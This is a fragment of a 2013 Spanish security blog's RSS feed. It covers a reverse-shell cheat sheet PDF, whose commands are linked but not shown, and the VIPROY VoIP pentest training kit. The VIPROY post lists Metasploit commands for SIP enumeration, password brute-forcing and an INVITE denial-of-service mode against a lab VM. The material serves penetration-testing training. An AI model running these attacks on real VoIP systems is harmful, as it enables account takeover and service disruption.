href="http://feeds.feedburner.com/~ff/SXato2?a=PM_FQZnQCUo:Nv5ekQlQNHw:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=PM_FQZnQCUo:Nv5ekQlQNHw:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=PM_FQZnQCUo:Nv5ekQlQNHw:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=PM_FQZnQCUo:Nv5ekQlQNHw:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=PM_FQZnQCUo:Nv5ekQlQNHw:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/PM_FQZnQCUo" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/PM_FQZnQCUo/pentesting-tools-froggersh-vlan-hopping.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-225KsY7S_Dk/UW5nAdN-HpI/AAAAAAAAEdA/GvzCcT4Wyls/s72-c/Frogger_Scripts.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/04/pentesting-tools-froggersh-vlan-hopping.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-8747455313375083436</guid><pubDate>Tue, 16 Apr 2013 16:37:00 +0000</pubDate><atom:updated>2013-04-18T10:35:48.907+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">PDF</category><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">Pentester</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">Unix</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">v1</category><category domain="http://www.blogger.com/atom/ns#">Cheat Sheet</category><category domain="http://www.blogger.com/atom/ns#">Commands</category><title>#Pentester [Cheat Sheet] One-Liner Reverse Shell</title><description>&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-LvU9uXhsWf8/UW1-Onam2AI/AAAAAAAAEcw/X2cyVqrbUC8/s1600/ST2labs-OneLiner-Reverse-Shell_cheetsheet.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-LvU9uXhsWf8/UW1-Onam2AI/AAAAAAAAEcw/X2cyVqrbUC8/s1600/ST2labs-OneLiner-Reverse-Shell_cheetsheet.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Hace un tiempo escribí un&amp;nbsp;&lt;a href="http://www.seguridadparatodos.es/2011/09/post-explotiation-reverse-shell-cheat.html" target="_blank"&gt;artículo&lt;/a&gt;&amp;nbsp;con una recopilación de comandos de Unix/Linux listo para ser utilizados en la etapa de "Explotation", es decir, momento en el que se explota con éxito la vulnerabilidad detectada, por ejemplo, inyectando una línea de comando que habilite una terminal remota (Shell inversa) con el que controlar el Sistema vulnerable.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Para celebrar que &lt;b&gt;he superado los 800&lt;/b&gt; seguidores en Twitter, he realizado una recopilación de algunos de los comandos más utilizados y populares en la creación de "&lt;u&gt;Reverse Shells&lt;/u&gt;", o lo que es lo mismo, comandos de Linux para generar una conexión desde la victima con una Shell de Linux activa.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Esta recopilación de comandos la he plasmado en una&amp;nbsp;sola&amp;nbsp;hoja a modo de "chuleta" (&lt;b&gt;Cheet Sheet&lt;/b&gt;) para &amp;nbsp;que los #Pentester y/o #Ethical Hacker (o cualquier otro profesional de la Seguridad) la tenga a mano durante un test de penetración y/o&amp;nbsp;Auditoria&amp;nbsp;de Seguridad.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
A continuación os dejo el enlace para que&amp;nbsp;podáis&amp;nbsp;descargar este PDF:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-MNJj-hwMaI4/Tm3cJSPzotI/AAAAAAAABRY/6ivX2eZZlTs/s1600/My-Adobe-PDF-Files-icon_90x90.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-MNJj-hwMaI4/Tm3cJSPzotI/AAAAAAAABRY/6ivX2eZZlTs/s1600/My-Adobe-PDF-Files-icon_90x90.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a href="https://www.dropbox.com/sh/nntv240nn70z36y/__6n2BAKme/ST2Labs_Reverse_Shell_OL_Cheat-Sheet-v.1.0.pdf?utm_source=ST2&amp;amp;utm_medium=Blog&amp;amp;utm_term=OL&amp;amp;utm_content=PDF_CheatSheet&amp;amp;utm_campaign=OL_ReverseShell" target="_blank"&gt;ST2Labs_Reverse_Shell_OL_Cheat-Sheet-v.1.0.pdf&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: x-small;"&gt;&lt;b&gt;SHA1&lt;/b&gt;:&amp;nbsp;585396e485223a5de8d8e403ba48a5b6d6e05127&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: x-small;"&gt;&lt;b&gt;Cheet Sheet based on&lt;/b&gt;: &lt;a href="http://pentestmonkey.net/"&gt;pentestmonkey.net&lt;/a&gt; &amp;amp;&amp;nbsp;&lt;/span&gt;&lt;span style="font-size: x-small;"&gt;&lt;a href="http://bernardodamele.blogspot.com.es/"&gt;http://bernardodamele.blogspot.com.es/&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=x5HGvYKZnYg:PVm_SgAQC6Q:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=x5HGvYKZnYg:PVm_SgAQC6Q:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=x5HGvYKZnYg:PVm_SgAQC6Q:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=x5HGvYKZnYg:PVm_SgAQC6Q:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=x5HGvYKZnYg:PVm_SgAQC6Q:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=x5HGvYKZnYg:PVm_SgAQC6Q:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=x5HGvYKZnYg:PVm_SgAQC6Q:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=x5HGvYKZnYg:PVm_SgAQC6Q:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=x5HGvYKZnYg:PVm_SgAQC6Q:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=x5HGvYKZnYg:PVm_SgAQC6Q:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/x5HGvYKZnYg" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/x5HGvYKZnYg/pentester-cheat-sheet-one-liner-reverse.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-LvU9uXhsWf8/UW1-Onam2AI/AAAAAAAAEcw/X2cyVqrbUC8/s72-c/ST2labs-OneLiner-Reverse-Shell_cheetsheet.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/04/pentester-cheat-sheet-one-liner-reverse.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-6148807963798757875</guid><pubDate>Thu, 11 Apr 2013 10:51:00 +0000</pubDate><atom:updated>2013-04-11T12:51:21.185+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">VMware</category><category domain="http://www.blogger.com/atom/ns#">Tools</category><category domain="http://www.blogger.com/atom/ns#">Pentester</category><category domain="http://www.blogger.com/atom/ns#">VoIP</category><category domain="http://www.blogger.com/atom/ns#">Noticias</category><category domain="http://www.blogger.com/atom/ns#">Metasploit</category><category domain="http://www.blogger.com/atom/ns#">Seguridad</category><title>VIPROY - VoIP Penetration Testing Kit</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-cX1G_wpBwCg/UWaVkGh1X4I/AAAAAAAAEQ8/_xnj_eMi8DI/s1600/VIProy_cabecera.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-cX1G_wpBwCg/UWaVkGh1X4I/AAAAAAAAEQ8/_xnj_eMi8DI/s1600/VIProy_cabecera.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;¿Qué es VIPROY?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Es un servidor SIP (Session Initiation Protocol) basado en Asterisk, configurado y preparado para el entrenamiento de los Pentester, es decir, un servidor vulnerable preparado para trabajar y soportar comunicaciones por VoIP. Esta pensado para conseguir averiguar el password (cracking) y obtener acceso a los buzones de voz.&lt;/div&gt;
&lt;blockquote class="tr_bq" style="text-align: justify;"&gt;
SIP es el protocolo de señalización que hace posible el establecimiento de las llamadas de voz por Internet, es decir por IP.&lt;/blockquote&gt;
&lt;div style="text-align: justify;"&gt;
Este Kit se ha desarrollado para mejorar las habilidades de los Pentester en los entornos de VoIP, en especial las pruebas de seguridad que se realizan para los procesos de autenticación.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
VIPROY permite poner a prueba el sistema de autenticación, proporcionando de este modo un entrenamiento muy interesante para aquellos profesionales (Pentester) que se enfrenten a un test de penetración con infraestructura de VoIP.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Las pruebas o test que se incluyen en el Kit, son:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Options tester&lt;/b&gt;: manipulación de las opciones de comunicación en la VoIP, con el protoclo SIP se puede indicar el codec que se utiliza en la comunicación, así como el puerto de conexión. Se puede poner a prueba las opciones.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Brute force:&lt;/b&gt; Ataques de fuerza bruta en el proceso de identificación de cada&amp;nbsp;teléfono/ usuario.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Enumerator: &lt;/b&gt;Se puede poner en practica la técnica de conseguir información sobre los usaurios y/o terminales de VoIP, que tiene el servidor registrados.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Invite tester&lt;/b&gt;: pruebas en el proceso de llamada de los usuarios de VoIP.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Trust analyzer, Proxy/Registration tester&lt;/b&gt;: evaluar la seguridad del proceso de registro y la comunicación a través de proxy.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Como se puede apreciar, VIPROY ofrece un entorno ideal para el entrenamiento de los Pentester orientados a las infraestructuras con VoIP.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;PREPARANDO EL ESCENARIO&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El KIT consiste en un máquina virtual preparada y lista para su funcionamiento; se puede descargar en siguiente enlace:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-SWkwdGXo6O8/TmOkkR-psqI/AAAAAAAABN4/p88iDoTfLWI/s1600/Download_ICOnS.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-SWkwdGXo6O8/TmOkkR-psqI/AAAAAAAABN4/p88iDoTfLWI/s1600/Download_ICOnS.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
MD5 Hash of VulnVoIP.7z:&amp;nbsp;&lt;strong&gt;&lt;span style="color: red;"&gt;1411bc06403307d5ca2ecae47181972a&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;VMware:&amp;nbsp;&lt;a href="http://www.rebootuser.com/wp-content/uploads/vulnvoip/vulnvoip.7z"&gt;vulnvoip.7z&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Las&amp;nbsp;características&amp;nbsp;principales son: x86, VMWare. 512MB RAM, NAT network.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Github&lt;/b&gt;:&amp;nbsp;&lt;a href="https://github.com/fozavci/viproy-voipkit"&gt;https://github.com/fozavci/viproy-voipkit&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Por supuesto, para usar correctamente el entorno, se debe de conocer como estan configurados los diferentes módulos del Servidor Asterisk.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
A continuación, copio la información que la &lt;a href="http://viproy.com/voipkit/" target="_blank"&gt;página oficial &lt;/a&gt;proporciona:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;i&gt;&lt;span style="font-size: x-small;"&gt;Global Settings&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;i&gt;&lt;span style="font-size: x-small;"&gt;setg CHOST 192.168.1.99 #Local Host&lt;br /&gt;
    setg CPORT 5099 #Local Port&lt;br /&gt;
    setg RHOSTS 192.168.1.1-254 #Target Network&lt;br /&gt;
    setg RHOST 192.168.1.201 #Target Host&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;


    &lt;h3&gt;
&lt;i&gt;&lt;span style="font-size: x-small;"&gt;Basic Usage of OPTIONS Module&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;i&gt;&lt;span style="font-size: x-small;"&gt;use auxiliary/scanner/sip/vsipoptions &lt;br /&gt;
    show options &lt;br /&gt;
    set THREADS 255&lt;br /&gt;
    run&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;


    &lt;h3&gt;
&lt;i&gt;&lt;span style="font-size: x-small;"&gt;Basic Usage of REGISTER Module &lt;br /&gt;
    &lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;i&gt;&lt;span style="font-size: x-small;"&gt;use auxiliary/scanner/sip/vsipregister&lt;br /&gt;
    show options &lt;br /&gt;
    run&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;


    &lt;i&gt;&lt;span style="font-size: x-small;"&gt;set LOGIN true&lt;br /&gt;
    set USERNAME 101&lt;br /&gt;
    set PASSWORD s3cur3&lt;br /&gt;
    run&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;


    &lt;h3&gt;
&lt;i&gt;&lt;span style="font-size: x-small;"&gt;Basic Usage of INVITE Module&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;i&gt;&lt;span style="font-size: x-small;"&gt;use auxiliary/scanner/sip/vsipinvite &lt;br /&gt;
    set FROM 2000&lt;br /&gt;
    set TO 1000&lt;br /&gt;
    run&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;


    &lt;i&gt;&lt;span style="font-size: x-small;"&gt;set LOGIN true&lt;br /&gt;
    set FROM 102&lt;br /&gt;
    set USERNAME 102&lt;br /&gt;
    set PASSWORD letmein123&lt;br /&gt;
    run&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;


    &lt;i&gt;&lt;span style="font-size: x-small;"&gt;set DOS_MODE true&lt;br /&gt;
    set NUMERIC_USERS true&lt;br /&gt;
    set NUMERIC_MIN 200&lt;br /&gt;
    set NUMERIC_MAX 205&lt;br /&gt;
    run&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;


    &lt;h3&gt;
&lt;i&gt;&lt;span style="font-size: x-small;"&gt;Basic Usage of ENUMERATOR Module&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;i&gt;&lt;span style="font-size: x-small;"&gt;use auxiliary/scanner/sip/vsipenumerator  &lt;br /&gt;
    show options &lt;br /&gt;
    unset USERNAME  &lt;br /&gt;
    set USER_FILE /tmp/files/users2 &lt;br /&gt;
    set VERBOSE false &lt;br /&gt;
    set METHOD SUBSCRIBE  &lt;br /&gt;
    run &lt;/span&gt;&lt;/i&gt;&lt;br /&gt;


    &lt;i&gt;&lt;span style="font-size: x-small;"&gt;unset USER_FILE &lt;br /&gt;
    set METHOD SUBSCRIBE &lt;br /&gt;
    set NUMERIC_USERS true &lt;br /&gt;
    set NUMERIC_MAX 2300 &lt;br /&gt;
    run &lt;/span&gt;&lt;/i&gt;&lt;br /&gt;


    &lt;i&gt;&lt;span style="font-size: x-small;"&gt;set METHOD REGISTER &lt;br /&gt;
    run &lt;/span&gt;&lt;/i&gt;&lt;br /&gt;


    &lt;h3&gt;
&lt;i&gt;&lt;span style="font-size: x-small;"&gt;Basic Usage of BRUTE FORCE Module&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;i&gt;&lt;span style="font-size: x-small;"&gt;use auxiliary/scanner/sip/vsipbruteforce &lt;br /&gt;
    show options &lt;br /&gt;
    set RHOST 192.168.1.201 &lt;br /&gt;
    set USERNAME 2000 &lt;br /&gt;
    set PASS_FILE /tmp/files/passwords  &lt;br /&gt;
    set VERBOSE false &lt;br /&gt;
    run &lt;/span&gt;&lt;/i&gt;&lt;br /&gt;


    &lt;i&gt;&lt;span style="font-size: x-small;"&gt;unset USERNAME  &lt;br /&gt;
    set USER_FILE /tmp/files/users2 &lt;br /&gt;
    run &lt;/span&gt;&lt;/i&gt;&lt;br /&gt;


    &lt;i&gt;&lt;span style="font-size: x-small;"&gt;unset USER_FILE &lt;br /&gt;
    set NUMERIC_USERS true &lt;br /&gt;
    set NUMERIC_MAX 500 &lt;br /&gt;
    run &lt;/span&gt;&lt;/i&gt;&lt;br /&gt;


    &lt;h3&gt;
&lt;i&gt;&lt;span style="font-size: x-small;"&gt;Basic Usage of Trust Analyzer Module&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;i&gt;&lt;span style="font-size: x-small;"&gt;use auxiliary/scanner/sip/vsiptrust&lt;br /&gt;
    show options &lt;br /&gt;
    set SRC_RHOSTS 192.168.1.200-210&lt;br /&gt;
    set SRC_RPORTS 5060&lt;br /&gt;
    set SIP_SERVER 192.168.1.201&lt;br /&gt;
    set INTERFACE eth0&lt;br /&gt;
    set TO 101&lt;br /&gt;
    run&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;


    &lt;i&gt;&lt;span style="font-size: x-small;"&gt;show options &lt;br /&gt;
    set ACTION CALL&lt;br /&gt;
    set SRC_RHOSTS 192.168.1.202&lt;br /&gt;
    set FROM James Bond&lt;br /&gt;
    run&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;


    &lt;h3&gt;
&lt;i&gt;&lt;span style="font-size: x-small;"&gt;Basic Usage of SIP Proxy Module&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;i&gt;&lt;span style="font-size: x-small;"&gt;use auxiliary/scanner/sip/vsipproxy &lt;br /&gt;
    show options &lt;br /&gt;
    set PRXCLT_PORT 5060&lt;br /&gt;
    set PRXCLT_IP 192.168.1.99 &lt;br /&gt;
    set PRXSRV_PORT 5089&lt;br /&gt;
    set PRXSRV_IP 192.168.1.99 &lt;br /&gt;
    set CLIENT_IP 192.168.1.120&lt;br /&gt;
    set CLIENT_PORT 5060&lt;br /&gt;
    set SERVER_IP 192.168.1.201&lt;br /&gt;
    set SERVER_PORT 5060&lt;br /&gt;
    set CONF_FILE /tmp/sipproxy_replace.txt&lt;br /&gt;
    set LOG true&lt;br /&gt;
    set VERBOSE false&lt;br /&gt;
    run&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;EJEMPLO DE USO: DEMO&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
A continuación os dejo un vídeo de demostración con #Metasploit SIP Module, &amp;nbsp;donde se puede ver algunos ataques realizados dentro de este entorno vulnerable, por poner un ejemplo: SIP Service Discovery, ejecutando un REGISTER sin credenciales.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;object width="320" height="266" class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://img.youtube.com/vi/1vDTujNVKGM/0.jpg"&gt;&lt;param name="movie" value="http://youtube.googleapis.com/v/1vDTujNVKGM&amp;source=uds" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;param name="allowFullScreen" value="true" /&gt;&lt;embed width="320" height="266"  src="http://youtube.googleapis.com/v/1vDTujNVKGM&amp;source=uds" type="application/x-shockwave-flash" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Para más información:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[1] &lt;a href="http://viproy.com/voipkit/" target="_blank"&gt;Página oficial del proyecto&lt;/a&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[2] &lt;a href="http://www.rebootuser.com/?p=1117#more-1117" target="_blank"&gt;Página con pruebas: Testing Kit&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Vía: &lt;a href="http://www.toolswatch.org/2013/04/viproy-voip-penetration-testing-kit-released/" target="_blank"&gt;Toolswatch.org&lt;/a&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=eHXgO7HHcmA:14O41iK24Dk:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=eHXgO7HHcmA:14O41iK24Dk:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=eHXgO7HHcmA:14O41iK24Dk:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=eHXgO7HHcmA:14O41iK24Dk:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=eHXgO7HHcmA:14O41iK24Dk:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=eHXgO7HHcmA:14O41iK24Dk:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=eHXgO7HHcmA:14O41iK24Dk:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=eHXgO7HHcmA:14O41iK24Dk:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=eHXgO7HHcmA:14O41iK24Dk:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=eHXgO7HHcmA:14O41iK24Dk:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
